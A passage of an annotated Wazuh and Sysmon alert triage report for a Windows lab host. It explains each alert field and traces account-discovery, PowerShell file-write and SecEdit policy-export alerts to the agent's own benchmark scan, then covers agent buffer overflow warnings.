ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Account Discovery']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  26
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534575.2327789
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
ETW provider that emitted the event. Microsoft-Windows-Sysmon means eventID has to be read against the Sysmon table, not the Security log.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
GUID of that provider; {5770385f-c22a-43e0-bf4c-06f5698ffbd9} is Sysmon's. Stable across renames, so filter on it rather than on the name.

data.win.system.eventID:  1
Sysmon Event ID, not a Security-log ID: 1 = Process Create. Others worth knowing: 3 network connection, 7 image load, 10 process access, 11 file create, 13 registry value set, 22 DNS query.

data.win.system.version:  5
Schema version of the event payload. Bumps when Sysmon adds fields; only matters when a decoder starts dropping them.

data.win.system.level:  4
ETW level: 4 = Informational (same as severityValue). Sysmon writes nearly everything at 4, so it carries no triage signal.

data.win.system.task:  1
Task category. For Sysmon events it equals the Event ID, so it adds nothing here.

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:42:46.4773051Z
When the record was written to the Sysmon channel (UTC). Compare with utcTime (when Sysmon saw the action) and timestamp (when the manager indexed it) to measure forwarding lag.

data.win.system.eventRecordID:  291351
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
PID of the process that logged the event, i.e. the Sysmon service, not the process being reported; the reported one is data.win.eventdata.processId.

data.win.system.threadID:  4740
Thread inside the Sysmon service that wrote the record. No triage value.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
Event log channel. Microsoft-Windows-Sysmon/Operational confirms the source and is the channel to export with wevtutil for offline review.

data.win.system.computer:  Attacker
Hostname Windows stamped on the event. Should equal agent.name; a mismatch points at a forwarding or agent-naming problem.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:42:44.314 ProcessGuid: {94294ddc-be64-680a-340c-000000000e00} ProcessId: 14436 Image: C:\Windows\SysWOW64\net1.exe FileVersion: 10.0.26100.1 (WinBuild.160101.0800) Description: Net Command Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: net1.exe CommandLine: C:\WINDOWS\system32\net1 accounts CurrentDirectory: C:\Program Files (x86)\ossec-agent\ User: NT AUTHORITY\SYSTEM LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000} LogonId: 0x3E7 TerminalSessionId: 0 IntegrityLevel: System Hashes: SHA256=647136C32E9E7639B251719CFE503F1BD482335AECEC7AE7CB8A91B0A9805D49 ParentProcessGuid: {94294ddc-be64-680a-320c-000000000e00} ParentProcessId: 10704 ParentImage: C:\Windows\SysWOW64\net.exe ParentCommandLine: net.exe accounts ParentUser: NT AUTHORITY\SYSTEM"
Rendered Sysmon message with every field inline. Same data as the eventdata.* fields below; fall back to it when the decoder dropped or mangled a field.

data.win.eventdata.utcTime:  2025-04-24 22:42:44.314
When Sysmon observed the process start (UTC). Earlier than timestamp by the forwarding delay; use this one for the host timeline.

data.win.eventdata.processGuid:  {94294ddc-be64-680a-340c-000000000e00}
Sysmon's process GUID (machine GUID, boot session and start time). Never reused, unlike the PID, so pivot on it to pull every Sysmon event this process produced (network, file, registry, DNS).

data.win.eventdata.processId:  14436
Windows PID. Reused after the process exits, so pair it with processGuid or utcTime before correlating.

data.win.eventdata.image:  C:\\Windows\\SysWOW64\\net1.exe
Full path of the started executable. net1.exe is the helper that net.exe hands every subcommand to, so two Event ID 1 records per `net` command are normal. SysWOW64 means the 32-bit copy.

data.win.eventdata.fileVersion:  10.0.26100.1 (WinBuild.160101.0800)
Version string from the PE resource. A Microsoft binary whose version does not match the host's build, or has none, deserves a hash lookup.

data.win.eventdata.description:  Net Command
Description string from the PE version resource. Trivial to forge, so corroborate with the hash, but a mismatch against the file name is a quick tell.

data.win.eventdata.product:  Microsoft® Windows® Operating System
Product string from the PE version resource. Same caveat as description.

data.win.eventdata.company:  Microsoft Corporation
Company string from the PE version resource. Same caveat as description.

data.win.eventdata.originalFileName:  net1.exe
File name compiled into the PE. Compare with image: a renamed LOLBin (net1.exe copied to update.exe, say) shows its real name here.

data.win.eventdata.commandLine:  C:\\WINDOWS\\system32\\net1 accounts
Exact command line. `net1 accounts` prints the password and lockout policy; read-only discovery, nothing is changed.

data.win.eventdata.currentDirectory:  C:\\Program Files (x86)\\ossec-agent\\
Working directory of the new process. Here the Wazuh agent install folder, which points at the agent's own scan as the originator; confirm via the parent chain.

data.win.eventdata.user:  NT AUTHORITY\\SYSTEM
Account the process runs as. NT AUTHORITY\SYSTEM means no interactive user; consistent with a service such as the agent.

data.win.eventdata.logonGuid:  {94294ddc-ea7f-67fe-e703-000000000000}
Identifier of the logon session. Joins this process to its 4624 logon event when you need to know how the account got in.

data.win.eventdata.logonId:  0x3e7
Logon session ID. 0x3e7 (999) is the fixed SYSTEM logon present on every Windows host, so it says nothing about an intruder's session.

data.win.eventdata.terminalSessionId:  0
Windows session number. 0 is the services session with no desktop; an interactive user would be 1 or higher.

data.win.eventdata.integrityLevel:  System
Integrity level of the process token. System is the top, above High (elevated admin), Medium (normal user) and Low (sandboxed). A child above its parent's level is the UAC-bypass pattern.

data.win.eventdata.hashes:  SHA256=647136C32E9E7639B251719CFE503F1BD482335AECEC7AE7CB8A91B0A9805D49
Hashes of the on-disk image, using the algorithms set in the Sysmon config (SHA256 here). Check against your golden image or a reputation service; a Windows binary should match its OS build.

data.win.eventdata.parentProcessGuid:  {94294ddc-be64-680a-320c-000000000e00}
Sysmon GUID of the parent. Pivot on it to retrieve the parent's own Event ID 1 (command line, user, its parent) and walk the tree upward.

data.win.eventdata.parentProcessId:  10704
PID of the parent at creation time. PIDs are reused after exit, so prefer parentProcessGuid for correlation.

data.win.eventdata.parentImage:  C:\\Windows\\SysWOW64\\net.exe
Executable that spawned this one. net.exe launching net1.exe is the normal two-stage `net` command; the interesting parent is net.exe's own, which the alert above records as wazuh-agent.exe.

data.win.eventdata.parentCommandLine:  net.exe accounts
Command line of the parent. `net.exe accounts` is the command as issued; net1.exe merely repeats it.

data.win.eventdata.parentUser:  NT AUTHORITY\\SYSTEM
Account the parent runs as. Same SYSTEM on both sides, so no privilege boundary was crossed.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Powershell process created an executable file in Windows root folder

🧠 What happened? Powershell process created an executable file in Windows root folder

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:43:00.702+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer
Check targetFilename before acting on the T1105 label: `__PSScriptPolicyTest_<random>.ps1` under C:\Windows\SystemTemp is the empty probe script PowerShell writes at every start to test AppLocker/WDAC script enforcement, then deletes. It is not a downloaded tool and not an executable, and nothing on this alert shows network activity. The writer (processGuid {94294ddc-be67-680a-3a0c-000000000e00}) is the same SYSTEM PowerShell that launches SecEdit in the next alert, i.e. the Wazuh agent's scan. Close as a known false positive of rule 92205 and add an exception for `__PSScriptPolicyTest_*.ps1`; keep the rule for non-temp paths, non-.ps1 extensions, or a file create followed by Event ID 3/22 from the same processGuid.

🔍 Full Alert Details
timestamp:  2025-04-24T22:43:00.702+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  9
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell process created an executable file in Windows root folder
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92205
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  4
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534580.2332848
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
ETW provider that emitted the event. Microsoft-Windows-Sysmon means eventID has to be read against the Sysmon table, not the Security log.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
GUID of that provider; {5770385f-c22a-43e0-bf4c-06f5698ffbd9} is Sysmon's. Stable across renames, so filter on it rather than on the name.

data.win.system.eventID:  11
Sysmon Event ID, not a Security-log ID: 11 = File Create, logged only for paths the Sysmon config includes. Pair it with Event ID 1 for the writing process and Event ID 3/22 for any download.

data.win.system.version:  2
Schema version of the event payload. Bumps when Sysmon adds fields; only matters when a decoder starts dropping them.

data.win.system.level:  4
ETW level: 4 = Informational (same as severityValue). Sysmon writes nearly everything at 4, so it carries no triage signal.

data.win.system.task:  11
Task category. For Sysmon events it equals the Event ID (11 = File Create here), so it adds nothing.

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:42:48.2996900Z
When the record was written to the Sysmon channel (UTC). Compare with utcTime (when Sysmon saw the action) and timestamp (when the manager indexed it) to measure forwarding lag.

data.win.system.eventRecordID:  291773
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
PID of the process that logged the event, i.e. the Sysmon service, not the process being reported; the reported one is data.win.eventdata.processId.

data.win.system.threadID:  4740
Thread inside the Sysmon service that wrote the record. No triage value.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
Event log channel. Microsoft-Windows-Sysmon/Operational confirms the source and is the channel to export with wevtutil for offline review.

data.win.system.computer:  Attacker
Hostname Windows stamped on the event. Should equal agent.name; a mismatch points at a forwarding or agent-naming problem.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:42:48.298 ProcessGuid: {94294ddc-be67-680a-3a0c-000000000e00} ProcessId: 8604 Image: C:\WINDOWS\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Windows\SystemTemp\__PSScriptPolicyTest_p4vcdh3q.d4n.ps1 CreationUtcTime: 2025-04-24 22:42:48.298 User: NT AUTHORITY\SYSTEM"
Rendered Sysmon message with every field inline. Note TargetFilename: `__PSScriptPolicyTest_<random>.ps1` under SystemTemp is the probe PowerShell writes at start-up to test AppLocker/WDAC script enforcement, not a dropped tool.

data.win.eventdata.utcTime:  2025-04-24 22:42:48.298
When Sysmon observed the file creation (UTC). Earlier than timestamp by the forwarding delay; use this one for the host timeline.

data.win.eventdata.processGuid:  {94294ddc-be67-680a-3a0c-000000000e00}
Sysmon GUID of the writing process. It reappears as parentProcessGuid in the SecEdit alert that follows, so this PowerShell is the one the agent launched for its scan.

data.win.eventdata.processId:  8604
Windows PID of the writing process. Reused after the process exits, so pair it with processGuid or utcTime before correlating.

data.win.eventdata.image:  C:\\WINDOWS\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe
Process that created the file: 32-bit Windows PowerShell (SysWOW64), which follows from its parent being the 32-bit Wazuh agent.

data.win.eventdata.targetFilename:  C:\\Windows\\SystemTemp\\__PSScriptPolicyTest_p4vcdh3q.d4n.ps1
Path of the created file. `__PSScriptPolicyTest_<random>.ps1` is written (empty) by PowerShell itself on every start to check whether AppLocker/WDAC allows scripts, then removed; it is neither an executable nor a transferred tool, and you should expect one per powershell.exe launch. A real ingress would be a non-temp path or a non-.ps1 extension, with Event ID 3/22 from the same processGuid.

data.win.eventdata.creationUtcTime:  2025-04-24 22:42:48.298
Creation time Sysmon read from the file. Normally equals utcTime; if it is much earlier, an existing file was overwritten rather than created.

data.win.eventdata.user:  NT AUTHORITY\\SYSTEM
Account that wrote the file. SYSTEM, matching the agent-driven PowerShell; no user session involved.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

C:\\Windows\\SysWOW64\\SecEdit.exe binary in a suspicious location launched by C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe

🧠 What happened? C:\\Windows\\SysWOW64\\SecEdit.exe binary in a suspicious location launched by C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:43:04.484+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter
Two things in the rule text do not hold up. 'Suspicious location': C:\Windows\SysWOW64\SecEdit.exe is the standard 32-bit copy; the command line asked for system32 and WOW64 file-system redirection answered with SysWOW64 because the parent is 32-bit PowerShell under the 32-bit agent (Program Files (x86)). 'Launched by powershell.exe': the parent command line exports the local security policy and greps LSAAnonymousNameLookup out of it, the CIS benchmark check that Wazuh SCA runs as SYSTEM, and the parent's GUID equals the PowerShell processGuid in the previous alert. Confirm that SCA is enabled on this agent and that powershell.exe's own parent is wazuh-agent.exe; if both hold, close as expected activity and scope an exception on parentImage plus currentDirectory rather than silencing 92066. If the chain does not end at the agent, treat the secedit export as an attacker reading local policy and pull the Event ID 11 for secexport.cfg.

🔍 Full Alert Details
timestamp:  2025-04-24T22:43:04.484+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  4
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  C:\\Windows\\SysWOW64\\SecEdit.exe binary in a suspicious location launched by C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92066
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  1
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534584.2335549
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
ETW provider that emitted the event. Microsoft-Windows-Sysmon means eventID has to be read against the Sysmon table, not the Security log.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
GUID of that provider; {5770385f-c22a-43e0-bf4c-06f5698ffbd9} is Sysmon's. Stable across renames, so filter on it rather than on the name.

data.win.system.eventID:  1
Sysmon Event ID, not a Security-log ID: 1 = Process Create. Others worth knowing: 3 network connection, 7 image load, 10 process access, 11 file create, 13 registry value set, 22 DNS query.

data.win.system.version:  5
Schema version of the event payload. Bumps when Sysmon adds fields; only matters when a decoder starts dropping them.

data.win.system.level:  4
ETW level: 4 = Informational (same as severityValue). Sysmon writes nearly everything at 4, so it carries no triage signal.

data.win.system.task:  1
Task category. For Sysmon events it equals the Event ID, so it adds nothing here.

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:42:49.7011971Z
When the record was written to the Sysmon channel (UTC). Compare with utcTime (when Sysmon saw the action) and timestamp (when the manager indexed it) to measure forwarding lag.

data.win.system.eventRecordID:  292055
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
PID of the process that logged the event, i.e. the Sysmon service, not the process being reported; the reported one is data.win.eventdata.processId.

data.win.system.threadID:  4740
Thread inside the Sysmon service that wrote the record. No triage value.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
Event log channel. Microsoft-Windows-Sysmon/Operational confirms the source and is the channel to export with wevtutil for offline review.

data.win.system.computer:  Attacker
Hostname Windows stamped on the event. Should equal agent.name; a mismatch points at a forwarding or agent-naming problem.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:42:49.694 ProcessGuid: {94294ddc-be69-680a-3c0c-000000000e00} ProcessId: 6028 Image: C:\Windows\SysWOW64\SecEdit.exe FileVersion: 10.0.26100.1882 (WinBuild.160101.0800) Description: Windows Security Configuration Editor Command Tool Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: SeCEdit CommandLine: "C:\WINDOWS\system32\SecEdit.exe" /export /cfg C:\WINDOWS\TEMP/secexport.cfg CurrentDirectory: C:\Program Files (x86)\ossec-agent\ User: NT AUTHORITY\SYSTEM LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000} LogonId: 0x3E7 TerminalSessionId: 0 IntegrityLevel: System Hashes: SHA256=FB968BA2416A930CD06AC599A61A50569AAA846CA15D0880A5DB80A81CF1500A ParentProcessGuid: {94294ddc-be67-680a-3a0c-000000000e00} ParentProcessId: 8604 ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: powershell "$null = secedit /export /cfg $env:temp/secexport.cfg; $(gc $env:temp/secexport.cfg | Select-String \"LSAAnonymousNameLookup\").ToString().Split(\"=\")[1].Trim()" ParentUser: NT AUTHORITY\SYSTEM"
Rendered Sysmon message with every field inline. Read CommandLine against Image: the command asks for system32 but the image is SysWOW64, which is WOW64 file-system redirection for a 32-bit parent, not a relocated binary. ParentCommandLine exports the security policy and greps LSAAnonymousNameLookup, a CIS benchmark check.

data.win.eventdata.utcTime:  2025-04-24 22:42:49.694
When Sysmon observed the process start (UTC). Earlier than timestamp by the forwarding delay; use this one for the host timeline.

data.win.eventdata.processGuid:  {94294ddc-be69-680a-3c0c-000000000e00}
Sysmon process GUID of SecEdit. Never reused, unlike the PID; pivot on it to see whether this process did anything beyond writing secexport.cfg.

data.win.eventdata.processId:  6028
Windows PID. Reused after the process exits, so pair it with processGuid or utcTime before correlating.

data.win.eventdata.image:  C:\\Windows\\SysWOW64\\SecEdit.exe
Full path of the started executable. C:\Windows\SysWOW64\SecEdit.exe is the standard 32-bit copy of the Security Configuration Editor; the rule's 'suspicious location' wording does not fit this path.

data.win.eventdata.fileVersion:  10.0.26100.1882 (WinBuild.160101.0800)
Version string from the PE resource. A Microsoft binary whose version does not match the host's build, or has none, deserves a hash lookup.

data.win.eventdata.description:  Windows Security Configuration Editor Command Tool
Description string from the PE version resource. Trivial to forge, so corroborate with the hash, but a mismatch against the file name is a quick tell.

data.win.eventdata.product:  Microsoft® Windows® Operating System
Product string from the PE version resource. Same caveat as description.

data.win.eventdata.company:  Microsoft Corporation
Company string from the PE version resource. Same caveat as description.

data.win.eventdata.originalFileName:  SeCEdit
File name compiled into the PE. 'SeCEdit' without an extension is how Microsoft ships this binary, so the mismatch with image is expected here and is not a rename.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\system32\\SecEdit.exe\" /export /cfg C:\\WINDOWS\\TEMP/secexport.cfg
Exact command line. `secedit /export /cfg <file>` dumps the local security policy to a text file; read-only. The mixed slash in the path comes from the PowerShell one-liner ($env:temp/secexport.cfg).

data.win.eventdata.currentDirectory:  C:\\Program Files (x86)\\ossec-agent\\
Working directory of the new process. Here the Wazuh agent install folder, which points at the agent's own scan as the originator; confirm via the parent chain.

data.win.eventdata.user:  NT AUTHORITY\\SYSTEM
Account the process runs as. NT AUTHORITY\SYSTEM means no interactive user; consistent with a service such as the agent.

data.win.eventdata.logonGuid:  {94294ddc-ea7f-67fe-e703-000000000000}
Identifier of the logon session. Joins this process to its 4624 logon event when you need to know how the account got in.

data.win.eventdata.logonId:  0x3e7
Logon session ID. 0x3e7 (999) is the fixed SYSTEM logon present on every Windows host, so it says nothing about an intruder's session.

data.win.eventdata.terminalSessionId:  0
Windows session number. 0 is the services session with no desktop; an interactive user would be 1 or higher.

data.win.eventdata.integrityLevel:  System
Integrity level of the process token. System is the top, above High (elevated admin), Medium (normal user) and Low (sandboxed). A child above its parent's level is the UAC-bypass pattern.

data.win.eventdata.hashes:  SHA256=FB968BA2416A930CD06AC599A61A50569AAA846CA15D0880A5DB80A81CF1500A
Hashes of the on-disk image, using the algorithms set in the Sysmon config (SHA256 here). Check against your golden image or a reputation service; a Windows binary should match its OS build.

data.win.eventdata.parentProcessGuid:  {94294ddc-be67-680a-3a0c-000000000e00}
Sysmon GUID of the parent PowerShell. It equals processGuid in the previous alert (the __PSScriptPolicyTest write), so both alerts come from one PowerShell session; pivot on it for that session's own Event ID 1.

data.win.eventdata.parentProcessId:  8604
PID of the parent at creation time. PIDs are reused after exit, so prefer parentProcessGuid for correlation.

data.win.eventdata.parentImage:  C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe
Executable that spawned SecEdit: 32-bit Windows PowerShell launched from the agent folder. Pull its own Event ID 1 via parentProcessGuid to confirm wazuh-agent.exe sits above it.

data.win.eventdata.parentCommandLine:  powershell \"$null = secedit /export /cfg $env:temp/secexport.cfg; $(gc $env:temp/secexport.cfg | Select-String \\\"LSAAnonymousNameLookup\\\").ToString().Split(\\\"=\\\")[1].Trim()\"
Command line of the parent. Exports the security policy, then greps LSAAnonymousNameLookup out of it: the CIS 'Network access: allow anonymous SID/Name translation' check, the same one Wazuh's CIS SCA policies use. The parent is generic powershell.exe, which is why rule 92066 fires on any child it spawns.

data.win.eventdata.parentUser:  NT AUTHORITY\\SYSTEM
Account the parent runs as. Same SYSTEM on both sides, so no privilege boundary was crossed.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  6
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Agent event queue is 90% full.

🧠 What happened? Agent event queue is 90% full.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:43:13.995+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -
Operational, not attacker activity: the agent's client buffer reached 90 %, so agent 001 is producing events faster than it forwards them. The burst of Sysmon alerts just before this (firedtimes 26 on the discovery rule within the same minute) is the likely source. If the buffer reaches 'full', events are dropped and the host timeline gets a blind spot; watch the next alerts from this agent.

🔍 Full Alert Details
timestamp:  2025-04-24T22:43:13.995+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  7
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Agent event queue is 90% full.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  202
Numeric ID of the detection rule that fired.

rule.firedtimes:  2
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['wazuh', 'agent_flooding']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.pci_dss:  ['10.6.1']
PCI DSS mapping – card‑holder data rules.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534593.2341890
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

full_log:  wazuh: Agent buffer: '90%'.
The complete raw log message before parsing – last‑resort truth for deep dives.

decoder.parent:  wazuh
Parent decoder used – for nested parsing.

decoder.name:  wazuh
Name of the Wazuh decoder that parsed this raw log.

data.level:  90%
For the wazuh decoder this is the agent buffer state (90%, full, flooded), not a severity: 90% = warning, full = events are being dropped, flooded = sustained dropping.

location:  wazuh-agent
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Agent event queue is full. Events may be lost.

🧠 What happened? Agent event queue is full. Events may be lost.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:43:19.418+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -
Events are now being dropped on the agent. Record 2025-04-24T22:43:19Z onward as a collection gap for agent 001 and do not read the absence of Sysmon alerts in this window as evidence that nothing happened. Check the per-agent statistics on the manager and the <client_buffer> section of the agent's ossec.conf (queue_size, events_per_second).

🔍 Full Alert Details
timestamp:  2025-04-24T22:43:19.418+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  9
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Agent event queue is full. Events may be lost.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  203
Numeric ID of the detection rule that fired.

rule.firedtimes:  2
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['wazuh', 'agent_flooding']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.pci_dss:  ['10.6.1']
PCI DSS mapping – card‑holder data rules.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534599.2342118
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

full_log:  wazuh: Agent buffer: 'full'.
The complete raw log message before parsing – last‑resort truth for deep dives.

decoder.parent:  wazuh
Parent decoder used – for nested parsing.

decoder.name:  wazuh
Name of the Wazuh decoder that parsed this raw log.

data.level:  full
Sometimes reused by custom decoders for ad‑hoc severity – treat with caution.

location:  wazuh-agent
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
